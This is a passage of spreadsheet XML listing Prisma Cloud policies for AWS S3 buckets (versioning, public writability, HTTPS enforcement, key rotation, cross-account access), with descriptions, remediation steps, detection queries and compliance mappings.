      <c r="B2103" s="2" t="inlineStr">
        <is>
          <t>REVIEW</t>
        </is>
      </c>
      <c r="C2103" s="2" t="inlineStr"/>
      <c r="D2103" t="n">
        <v>0</v>
      </c>
      <c r="E2103" t="n">
        <v>0</v>
      </c>
      <c r="F2103" t="n">
        <v>1</v>
      </c>
      <c r="G2103" t="b">
        <v>1</v>
      </c>
      <c r="H21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dm-test-Org,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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2103" t="inlineStr">
        <is>
          <t>aws-s3api</t>
        </is>
      </c>
      <c r="K2103" t="inlineStr">
        <is>
          <t>AWS S3 Object Versioning is disabled</t>
        </is>
      </c>
      <c r="L2103" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2103" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2103" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2103" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2103" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2103" t="inlineStr">
        <is>
          <t>Control Category: 10.0</t>
        </is>
      </c>
      <c r="R2103" t="inlineStr">
        <is>
          <t>10.k</t>
        </is>
      </c>
      <c r="S2103" t="inlineStr"/>
      <c r="T2103" t="b">
        <v>1</v>
      </c>
      <c r="U2103" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2103" t="inlineStr">
        <is>
          <t>aws-s3api-get-bucket-acl</t>
        </is>
      </c>
      <c r="W2103" t="inlineStr">
        <is>
          <t>This policy identifies the S3 buckets which have Object Versioning disabled. S3 Object Versioning is an important capability in protecting your data within a bucket. Once you enable Object Versioning, you cannot remove it; you can suspend Object Versioning at any time on a bucket if you do not wish for it to persist. It is recommended to enable Object Versioning on S3.</t>
        </is>
      </c>
      <c r="X2103" t="inlineStr">
        <is>
          <t>1. Log into your AWS Console and select the S3 service.
2. Choose the reported S3 bucket and click the Properties tab in the upper right frame.
3. Expand the Versioning option
4. Click Enable Versioning
5. Click Save 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/s3-policies/s3-16-enable-versioning
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/s3-policies/s3-16-enable-versioning</t>
        </is>
      </c>
      <c r="Y2103" t="inlineStr">
        <is>
          <t>'description': "This CLI command requires 's3:PutBucketVersioning' permission. Successful execution will enable Object Versioning for the respective S3 bucket.",
'impact': 'Enable Object Versioning for the respective S3',
'cliScriptTemplate': 'aws s3api put-bucket-versioning --bucket $resourceName --region $region --versioning-configuration Status=Enabled'</t>
        </is>
      </c>
      <c r="Z2103" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-s3api-get-bucket-acl' AND json.rule = 'versioningConfiguration.status!=Enabled'
{"category":"Storage","resourceTypes":["aws_s3_bucket"]}</t>
        </is>
      </c>
      <c r="AA2103" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2103" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2103" t="inlineStr">
        <is>
          <t>PC-AWS-S3-259-CKV_AWS_21</t>
        </is>
      </c>
      <c r="AD2103" t="b">
        <v>1</v>
      </c>
      <c r="AE2103" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2103" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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dm-test-Org - Notifications:email, AccountGroups:DM_TEST_NEW;,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3" t="inlineStr">
        <is>
          <t>89ea62c1-3845-4134-b337-cc82203b8ff9</t>
        </is>
      </c>
      <c r="AI2103" t="inlineStr">
        <is>
          <t>8ec3f878-0f5e-4782-b4cd-98018b217be5</t>
        </is>
      </c>
      <c r="AJ2103" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2103" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2104">
      <c r="A2104" t="inlineStr"/>
      <c r="B2104" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2104" s="2" t="inlineStr"/>
      <c r="D2104" t="inlineStr"/>
      <c r="E2104" t="inlineStr"/>
      <c r="F2104" t="inlineStr"/>
      <c r="G2104" t="b">
        <v>1</v>
      </c>
      <c r="H21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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2104" t="inlineStr">
        <is>
          <t>aws-s3api</t>
        </is>
      </c>
      <c r="K2104" t="inlineStr">
        <is>
          <t>Data breach risk due to sensitive data in AWS S3 bucket that is publicly writable</t>
        </is>
      </c>
      <c r="L2104" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE,DISCOVERY</t>
        </is>
      </c>
      <c r="M2104" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2104" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2104" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2104" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2104" t="inlineStr"/>
      <c r="R2104" t="inlineStr"/>
      <c r="S2104" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2104" t="b">
        <v>0</v>
      </c>
      <c r="U2104" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2104" t="inlineStr">
        <is>
          <t>aws-s3api-get-bucket-acl</t>
        </is>
      </c>
      <c r="W2104" t="inlineStr">
        <is>
          <t>This policy identifies potential data breach risk due to AWS S3 buckets containing sensitive information is publicly writable.
The combination of public write permissions and sensitive data storage increases the likelihood of unauthorized data access, modification, or deletion, which can lead to a data breach.
Immediate attention is required to review and enforce stricter access methods for the reported S3 bucket as it contains sensitive information.</t>
        </is>
      </c>
      <c r="X2104" t="inlineStr">
        <is>
          <t>[PUBLIC_ACCESS]
1. Log in to the AWS Console
2. Navigate to the 'S3' service
3. Click on the S3 resource reported in the alert
4. Click on the 'Permissions' tab
5. If Access Control List is set to 'Public' follow the below steps
a. Under 'Access Control List', Click on 'Everyone' and uncheck all items
b. Under 'Access Control List', Click on 'Authenticated users group' and uncheck all items
c. Click on Save changes
6. If 'Bucket Policy' is set to public follow the below steps
a. Under 'Bucket Policy', Select 'Edit Bucket Policy' and consider defining what explicit 'Principal' should have the ability to PUT/CREATE/REPLICATE/DELETE objects in your S3 bucket. You may also want to specifically limit the 'Principal' ability to perform specific PUT/CREATE/REPLICATE/DELETE functions, without the wild card.
If 'Bucket Policy' is not required delete the existing 'Bucket Policy'.
b. Click on Save changes
Note: Make sure updating 'Access Control List' or 'Bucket Policy' does not affect S3 bucket data access.
[DATA_EXPOSURE]
1. Make sure the resource is not exposed to public.
2. Delete or move the sensitive data if it is mistakenly place</t>
        </is>
      </c>
      <c r="Y2104" t="inlineStr"/>
      <c r="Z2104" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('aws-s3api-get-bucket-acl') and finding.name contains all ('AWS S3 bucket publicly writable','Storage Asset with sensitive data found')</t>
        </is>
      </c>
      <c r="AA2104" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2104" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:05</t>
        </is>
      </c>
      <c r="AC2104" t="inlineStr"/>
      <c r="AD2104" t="b">
        <v>1</v>
      </c>
      <c r="AE2104" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2104" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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4" t="inlineStr">
        <is>
          <t>2cc1860c-46d8-464d-95d9-f3d4d9c39ffc</t>
        </is>
      </c>
      <c r="AI2104" t="inlineStr">
        <is>
          <t>e743902a-33d6-44e9-a316-f040bb21fd0c</t>
        </is>
      </c>
      <c r="AJ2104" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2104" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2105">
      <c r="A2105" t="inlineStr">
        <is>
          <t>ISO 27001:2013, CSA CCM v3.0.1, HITRUST CSF v9.3 [Deprecated], MITRE ATT&amp;CK v10.0 [Deprecated], ISO/IEC 27001:2022, GDPR, APRA (CPS 234) Information Security, CSA CCM v3.0.1, ISO 27002:2022, NIST 800-53 Rev 5, MLPS 2.0 (Level 3), NIST CSF, NIST CSF v2.0, RBI Baseline Cyber Security and Resilience Requirements, NIST CSF, RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.1.02, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, ISO 27002:2022, NIST SP 800-172, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, HITRUST CSF v9.3 [Deprecated], NIST 800-171 Rev1, HITRUST CSF v9.3 [Deprecated], HITRUST CSF v9.3 [Deprecated], NIST CSF v2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), GDPR, Matt's ATT&amp;ACK, jbrox - GDPR, TX-RAMP Level 1, APRA (CPS 234) Information Security, MITRE ATT&amp;CK v8.2 [Deprecated], ISO/IEC 27001:2022, CSA CCM v.4.0.6, ISO 27002:2022, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), HITRUST CSF v9.3 [Deprecated], HITRUST CSF v9.3 [Deprecated], MLPS 2.0, MITRE ATT&amp;CK v12, Microsoft Cloud Security Benchmark v1,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TX-RAMP Level 1, SOC 2, kashan ACSC Information Security Manual (ISM), CDC NIST 800-53 Rev4, NIST 800-53 Rev4, NIST 800-53 Rev 5, SOC 2, ISO 27001:2013, CIS Controls v7.1, NIST SP 800-171 Revision 3, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), MAS TRM 2021, CyberSecurity Law of the People's Republic of China, CHC HITRUST CSF v.9.6.0, PCI DSS v4.0, NIST CSF, NIST SP 800-171 Revision 3, Insurance Regulatory And Development Authority Of India, MITRE ATT&amp;CK v6.3 [Deprecated], Copy of CIS Controls v8, CRI Profile v1.2.1, PCI DSS v3.2.1, Risk Management in Technology (RMiT), CyberSecurity Law of the People's Republic of China, CIS Controls v8, CIS Controls v8, MLPS 2.0 (Level 2), CRI Profile v2.0, NIST 800-171 Rev1, SOC 2, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), NIST CSF, jbrox - GDPR, ISO/IEC 27001:2022, NIST 800-53 Rev4, HITRUST CSF v9.3 [Deprecated], Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Secure Controls Framework (SCF) - 2024.2, APRA (CPS 234) Information Security, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, CDC NIST 800-53 Rev4, NIST CSF, ISO/IEC 27001:2022, HITRUST v.9.4.2 [Deprecated], TX-RAMP Level 2, ISO 27002:2022, Copy of CIS Controls v8, SOC 2, Copy of ACSC Information Security Manual (ISM)-clone, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, HITRUST CSF v.9.6.0, CSA CCM v3.0.1, CCPA 2018, PIPEDA, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), NIST 800-171 Rev1, kfirdaus AWS Account-CS, NIST CSF, Brazilian Data Protection Law (LGPD), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CyberSecurity Law of the People's Republic of China, Sarbanes Oxley Act (SOX), ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), FFIEC, NIST SP 800-172, CSA CCM v3.0.1, TX-RAMP Level 2, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, NIST 800-171 Rev1, Australian Energy Sector Cyber Security Framework (AESCSF), Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), NIST SP 800-171 Revision 2</t>
        </is>
      </c>
      <c r="B2105" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2105" s="2" t="inlineStr"/>
      <c r="D2105" t="inlineStr"/>
      <c r="E2105" t="inlineStr"/>
      <c r="F2105" t="inlineStr"/>
      <c r="G2105" t="b">
        <v>1</v>
      </c>
      <c r="H21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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2105" t="inlineStr">
        <is>
          <t>aws-s3api</t>
        </is>
      </c>
      <c r="K2105" t="inlineStr">
        <is>
          <t>AWS S3 bucket accessible to unmonitored cloud accounts</t>
        </is>
      </c>
      <c r="L2105" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2105" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2105" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2105" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2105" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2105" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R2105" t="inlineStr">
        <is>
          <t>ISM-1566</t>
        </is>
      </c>
      <c r="S2105" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T2105" t="b">
        <v>0</v>
      </c>
      <c r="U2105" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2105" t="inlineStr">
        <is>
          <t>aws-s3api-get-bucket-acl</t>
        </is>
      </c>
      <c r="W2105" t="inlineStr">
        <is>
          <t>This policy identifies those S3 buckets which have either the read/write permission opened up for Cloud Accounts which are NOT part of Cloud Accounts monitored by Prisma Cloud. These accounts with read/write privileges should be reviewed and confirmed that these are valid accounts of your organization (or authorised by your organization) and are not active under Prisma Cloud monitoring.</t>
        </is>
      </c>
      <c r="X2105" t="inlineStr">
        <is>
          <t>1. Log in to the AWS Console
2. Navigate to the 'S3' service
3. Click on the reported S3 bucket
4. Click on the 'Permissions' tab
5. Navigate to the 'Access control list (ACL)' section and Click on the 'Edit'
6. Under 'Access for other AWS accounts', Add the Cloud Accounts that are monitored by Prisma Cloud
7. Click on 'Save changes'</t>
        </is>
      </c>
      <c r="Y2105" t="inlineStr"/>
      <c r="Z2105" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-s3api-get-bucket-acl' AND json.rule = "acl.grants[?(@.grantee.typeIdentifier=='id')].grantee.identifier size &gt; 0 and acl.grants[?(@.grantee.typeIdentifier=='id')].grantee.identifier does not contain c4c1ede66af53448b93c283ce9448c4ba468c9432aa01d700d3878632f77d2d0 and _AWSCloudAccount.isRedLockMonitored(acl.grants[?(@.grantee.typeIdentifier=='id')].grantee.identifier) is false"</t>
        </is>
      </c>
      <c r="AA2105" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2105" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2105" t="inlineStr">
        <is>
          <t>PC-AWS-S3-60</t>
        </is>
      </c>
      <c r="AD2105" t="b">
        <v>1</v>
      </c>
      <c r="AE2105" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2105" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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5" t="inlineStr">
        <is>
          <t>ea712527-83e7-7855-0ec9-1610194a9b9b</t>
        </is>
      </c>
      <c r="AI2105" t="inlineStr">
        <is>
          <t>ea712527-83e7-7855-0ec9-1610194a9b9b</t>
        </is>
      </c>
      <c r="AJ2105" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2105" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2106">
      <c r="A2106" t="inlineStr">
        <is>
          <t>HIPAA, ISO/IEC 27001:2022, Insurance Regulatory And Development Authority Of India, ISO/IEC 27001:2022, NYDFS 23 CRR-NY 500.0, NIST 800-53 Rev 5, ITSG-33, Korea – Information Security Management System (ISMS), Telecommunications Security Act - TSA, HITRUST CSF v.11.2.0, ISO/IEC 27001:2022, Telecommunications Security Act - TSA, Secure Controls Framework (SCF) - 2024.2, DORA, TX-RAMP Level 2, Secure Controls Framework (SCF) - 2022.2.1, Sarbanes Oxley Act (SOX), Korea – Information Security Management System (ISMS), MLPS 2.0 (Level 2), SOC 2, Secure Controls Framework (SCF) - 2022.2.1, HIPAA, Secure Controls Framework (SCF) - 2024.2, NYDFS 23 CRR-NY 500.0, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27001:2022, CIS Controls v8.1, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Secure Controls Framework (SCF) - 2024.2</t>
        </is>
      </c>
      <c r="B2106" s="2" t="inlineStr">
        <is>
          <t>REVIEW</t>
        </is>
      </c>
      <c r="C2106" s="2" t="inlineStr"/>
      <c r="D2106" t="n">
        <v>0</v>
      </c>
      <c r="E2106" t="n">
        <v>292</v>
      </c>
      <c r="F2106" t="n">
        <v>1</v>
      </c>
      <c r="G2106" t="b">
        <v>1</v>
      </c>
      <c r="H21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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2106" t="inlineStr">
        <is>
          <t>aws-s3api</t>
        </is>
      </c>
      <c r="K2106" t="inlineStr">
        <is>
          <t>AWS S3 bucket policy does not enforce HTTPS request only</t>
        </is>
      </c>
      <c r="L2106" t="inlineStr">
        <is>
          <t>UNENCRYPTED_DATA</t>
        </is>
      </c>
      <c r="M2106" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2106" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2106" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2106" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2106" t="inlineStr">
        <is>
          <t>Cryptographic Protections</t>
        </is>
      </c>
      <c r="R2106" t="inlineStr">
        <is>
          <t>CRY-03:Transmission Confidentiality</t>
        </is>
      </c>
      <c r="S2106" t="inlineStr"/>
      <c r="T2106" t="b">
        <v>0</v>
      </c>
      <c r="U2106" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2106" t="inlineStr">
        <is>
          <t>aws-s3api-get-bucket-acl</t>
        </is>
      </c>
      <c r="W2106" t="inlineStr">
        <is>
          <t>This policy identifies AWS S3 bucket having a policy that does not enforce only HTTPS requests. Enforcing the S3 bucket to accept only HTTPS requests would prevent potential attackers from eavesdropping on data in-transit or manipulating network traffic using man-in-the-middle or similar attacks. It is highly recommended to explicitly deny access to HTTP requests in S3 bucket policy.</t>
        </is>
      </c>
      <c r="X2106" t="inlineStr">
        <is>
          <t>1. Log in to the AWS console
2. Navigate to the S3 dashboard
3. Choose the reported S3 bucket
4. In the 'Permissions' tab, Click on 'Edit' under 'Bucket policy'
5. To update S3 bucket policy to enforce HTTPS request only, follow the below URL:
https://aws.amazon.com/premiumsupport/knowledge-center/s3-bucket-policy-for-config-rule/</t>
        </is>
      </c>
      <c r="Y2106" t="inlineStr"/>
      <c r="Z2106" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-s3api-get-bucket-acl' AND json.rule = policy.Statement[?any(Effect equals Deny and Action equals s3:* and (Principal.AWS equals * or Principal equals *) and Condition.Bool.aws:SecureTransport contains false )] does not exist</t>
        </is>
      </c>
      <c r="AA2106" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2106" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2106" t="inlineStr">
        <is>
          <t>PC-AWS-S3-897</t>
        </is>
      </c>
      <c r="AD2106" t="b">
        <v>1</v>
      </c>
      <c r="AE2106" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2106" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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6" t="inlineStr">
        <is>
          <t>cf833c55-0910-445b-b21b-23364871e11b</t>
        </is>
      </c>
      <c r="AI2106" t="inlineStr">
        <is>
          <t>b1584cec-cf43-420b-8c97-8baf747a2c98</t>
        </is>
      </c>
      <c r="AJ2106" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2106" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2107">
      <c r="A2107" t="inlineStr">
        <is>
          <t>HIPAA, CSA CCM v4.0.12, ISO/IEC 27001:2022, HITRUST CSF v.11.2.0, Microsoft Cloud Security Benchmark v1, DORA, Telecommunications Security Act - TSA, TX-RAMP Level 1, SOC 2, HIPAA, NYDFS 23 CRR-NY 500.0, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B2107" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2107" s="2" t="inlineStr"/>
      <c r="D2107" t="inlineStr"/>
      <c r="E2107" t="inlineStr"/>
      <c r="F2107" t="inlineStr"/>
      <c r="G2107" t="b">
        <v>1</v>
      </c>
      <c r="H21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07" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2107" t="inlineStr">
        <is>
          <t>aws-s3api</t>
        </is>
      </c>
      <c r="K2107" t="inlineStr">
        <is>
          <t>AWS S3 bucket encrypted with Customer Managed Key (CMK) is not enabled for regular rotation</t>
        </is>
      </c>
      <c r="L2107" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2107" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2107" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2107" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2107" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2107" t="inlineStr">
        <is>
          <t>SC</t>
        </is>
      </c>
      <c r="R2107" t="inlineStr">
        <is>
          <t>Cryptographic Key Establishment and Management</t>
        </is>
      </c>
      <c r="S2107" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T2107" t="b">
        <v>0</v>
      </c>
      <c r="U2107" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2107" t="inlineStr">
        <is>
          <t>aws-s3api-get-bucket-acl</t>
        </is>
      </c>
      <c r="W2107" t="inlineStr">
        <is>
          <t>This policy identifies Amazon S3 buckets that use Customer Managed Keys (CMKs) for encryption but are not enabled with key rotation. Amazon S3 bucket encryption key rotation failure can result in prolonged exposure of sensitive data and potential compliance violations. As a security best practice, it is important to rotate these keys periodically. This ensures that if the keys are compromised, the data in the underlying service remains secure with the new keys.</t>
        </is>
      </c>
      <c r="X2107" t="inlineStr">
        <is>
          <t>Recommendation:
The following steps are recommended to enable the automatic rotation of the KMS key used by the S3 bucket
1. Log in to the AWS Console and navigate to the 'S3' service.
2. Click on the S3 bucket reported in the alert.
3. Click on the 'Properties' tab.
4. Under the 'Default encryption' section, click on the KMS key link in 'Encryption key ARN'.
5. Under the 'Key rotation' tab on the navigated KMS key window, Enable 'Automatically rotate this CMK every year'.
6. Click on Save.</t>
        </is>
      </c>
      <c r="Y2107" t="inlineStr"/>
      <c r="Z2107" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name= 'aws-s3api-get-bucket-acl' AND json.rule = (sseAlgorithm contains "aws:kms" or sseAlgorithm contains "aws:kms:dsse") and kmsMasterKeyID exists as X; config from cloud.resource where api.name = 'aws-kms-get-key-rotation-status' AND json.rule = keyMetadata.keyState equals Enabled and keyMetadata.keyManager equal ignore case CUSTOMER and keyMetadata.origin equals AWS_KMS and (rotation_status.keyRotationEnabled is false or rotation_status.keyRotationEnabled equals "null")as Y; filter '$.X.kmsMasterKeyID contains $.Y.key.keyArn'; show X;</t>
        </is>
      </c>
      <c r="AA2107" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2107" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2107" t="inlineStr">
        <is>
          <t>PC-AWS-S3-1080</t>
        </is>
      </c>
      <c r="AD2107" t="b">
        <v>1</v>
      </c>
      <c r="AE2107" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2107" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG21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07" t="inlineStr">
        <is>
          <t>2c986eeb-e17e-4da4-b185-23ff56396286</t>
        </is>
      </c>
      <c r="AI2107" t="inlineStr">
        <is>
          <t>75cfa4ba-f05c-4a03-a571-6ebf8a6b8b32</t>
        </is>
      </c>
      <c r="AJ2107" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2107" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2108">
      <c r="A2108" t="inlineStr">
        <is>
          <t>ITSG-33, TX-RAMP Level 2, Insurance Regulatory And Development Authority Of India, NYDFS 23 CRR-NY 500.0</t>
        </is>
      </c>
      <c r="B2108" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2108" s="2" t="inlineStr"/>
      <c r="D2108" t="inlineStr"/>
      <c r="E2108" t="inlineStr"/>
      <c r="F2108" t="inlineStr"/>
      <c r="G2108" t="b">
        <v>1</v>
      </c>
      <c r="H21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08" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J2108" t="inlineStr">
        <is>
          <t>aws-s3api</t>
        </is>
      </c>
      <c r="K2108" t="inlineStr">
        <is>
          <t>AWS S3 bucket with cross-account access</t>
        </is>
      </c>
      <c r="L2108" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2108" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2108" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2108" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2108" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2108" t="inlineStr">
        <is>
          <t>500.2</t>
        </is>
      </c>
      <c r="R2108" t="inlineStr">
        <is>
          <t>500.02 (b) (2)</t>
        </is>
      </c>
      <c r="S2108" t="inlineStr"/>
      <c r="T2108" t="b">
        <v>0</v>
      </c>
      <c r="U2108" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2108" t="inlineStr">
        <is>
          <t>aws-s3api-get-bucket-acl</t>
        </is>
      </c>
      <c r="W2108" t="inlineStr">
        <is>
          <t>This policy identifies the AWS S3 bucket policy allows one or more of the actions (s3:DeleteBucketPolicy, s3:PutBucketAcl, s3:PutBucketPolicy, s3:PutEncryptionConfiguration, s3:PutObjectAcl) for a principal in another AWS account.
An S3 bucket policy that defines permissions and conditions for accessing an Amazon S3 bucket and its objects. Granting permissions like s3:DeleteBucketPolicy, s3:PutBucketAcl, s3:PutBucketPolicy, s3:PutEncryptionConfiguration, and s3:PutObjectAcl to other AWS accounts can lead to unauthorized access and potential data breaches.
It is recommended to review and remove permissions from the S3 bucket policy by deleting statements that grant access to restricted actions for other AWS accounts.</t>
        </is>
      </c>
      <c r="X2108" t="inlineStr">
        <is>
          <t>1. Login to the AWS Console
2. Navigate to the 'S3' service
3. Click on the 'S3' resource reported in the alert
4. Choose Permissions, and then choose Bucket Policy.
5. In the Bucket policy editor text box, do one of the following:
 5a. Remove the statements that grant access to denied actions to other AWS accounts
   or
    5b. Remove the permitted denied actions from the statements
6. Choose Save.</t>
        </is>
      </c>
      <c r="Y2108" t="inlineStr"/>
      <c r="Z2108" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-s3api-get-bucket-acl' AND json.rule = policy.Statement[?any(Effect equals Allow and (Principal.AWS does not equal * and Principal does not equal * and Principal.AWS contains arn and Principal.AWS does not contain $.accountId) and (Action contains "s3:Put*" or Action contains "s3:Delete*" or Action equals "*" or Action contains "s3:*" or Action is member of ('s3:DeleteBucketPolicy','s3:PutBucketAcl','s3:PutBucketPolicy','s3:PutEncryptionConfiguration','s3:PutObjectAcl') ))] exists</t>
        </is>
      </c>
      <c r="AA2108" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2108" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2108" t="inlineStr">
        <is>
          <t>PC-AWS-S3-1274</t>
        </is>
      </c>
      <c r="AD2108" t="b">
        <v>1</v>
      </c>
      <c r="AE2108" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2108" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
